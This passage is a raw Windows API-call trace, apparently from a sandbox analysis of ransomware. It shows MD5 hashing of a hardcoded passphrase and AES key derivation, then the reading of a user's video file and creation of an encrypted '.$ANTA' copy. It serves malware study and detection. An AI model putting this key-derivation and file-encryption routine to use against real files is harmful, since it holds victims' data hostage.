lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0103.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0103.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0103.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0103.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0103.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0103.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0103.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0103.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0103.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0103.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0103.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0103.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0103.217] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0103.263] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0103.263] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0103.264] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0103.264] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0103.264] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0103.264] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0103.264] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0103.264] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0103.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43caad8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0103.264] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e070 | out: phHash=0x144e070) returned 1 [0103.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0103.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e28a8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0103.264] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0103.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0103.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0103.266] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0103.266] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0103.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cac10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0103.266] CryptHashData (hHash=0x41ac000, pbData=0x17e2ae8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0103.266] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0103.266] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0103.266] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0103.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cac40, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0103.266] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac000, dwFlags=0x1, phKey=0x144e070 | out: phKey=0x144e070*=0x41ac700) returned 1 [0103.266] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0103.266] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0103.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796e08, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0103.266] CryptDestroyHash (hHash=0x41ac000) returned 1 [0103.266] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\333uErW2SJ.avi" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\333uerw2sj.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0103.267] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.267] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7a8 | out: lpNewFilePointer=0x0) returned 1 [0103.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0103.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0103.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0103.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0103.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0103.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0103.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0103.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0103.267] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0103.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0103.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0103.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0103.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0103.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0103.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0103.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0103.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0103.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0103.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0103.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0103.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0103.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0103.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0103.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0103.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0103.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0103.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0103.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0103.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0103.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0103.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391dc8 [0103.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0103.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a7cf8 [0103.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5360 [0103.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4590 [0103.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0103.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5360 [0103.268] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca")) returned 0x10 [0103.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0103.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0103.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0103.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0103.269] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\333uErW2SJ.avi.$ANTA" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\333uerw2sj.avi.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0103.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0103.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0103.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0103.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0103.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0103.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0103.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0103.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0103.270] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0103.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0103.270] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0103.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0103.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0103.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0103.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0103.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0103.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0103.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0103.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0103.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0103.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0103.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0103.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e09020 [0103.273] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7f8 | out: lpNewFilePointer=0x0) returned 1 [0103.273] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e820*=0x5d3, lpOverlapped=0x0) returned 1 [0103.273] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e820*=0x0, lpOverlapped=0x0) returned 1 [0103.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0103.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0103.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0103.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0103.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x5d3) returned 0x43e8a88 [0103.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e09020 | out: hHeap=0x1780000) returned 1 [0103.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0103.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0103.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0103.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0103.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0103.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x5d3) returned 0x43fd3b8 [0103.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8a88 | out: hHeap=0x1780000) returned 1 [0103.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0103.276] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0103.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0103.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0103.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0103.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0103.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0103.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x5d3) returned 0x43fd998 [0103.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0103.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43fd998 | out: hHeap=0x1780000) returned 1 [0103.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0103.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0103.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0103.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0103.277] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0103.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0103.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0103.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0103.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0103.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0103.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0103.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0103.277] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0103.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0103.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0103.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e00 [0103.277] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0103.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e00 | out: hHeap=0x1780000) returned 1 [0103.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0103.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0103.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2770 [0103.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0103.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0103.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0103.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0103.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x5d3) returned 0x43fd998 [0103.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0103.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e29d0 [0103.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0103.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0103.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0103.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2aa0 [0103.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0103.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0103.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0103.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2940 [0103.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0103.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0103.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0103.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca958 [0103.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0103.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0103.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0103.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0103.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0103.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x5d3) returned 0x43e8a88 [0103.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0103.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0103.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0103.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0103.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0103.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0103.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0103.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0103.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0103.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0103.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0103.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0103.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0103.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0103.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0103.279] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0103.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0103.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0103.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0103.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0103.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0103.279] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0103.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0103.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0103.279] RtlAllocateHeap 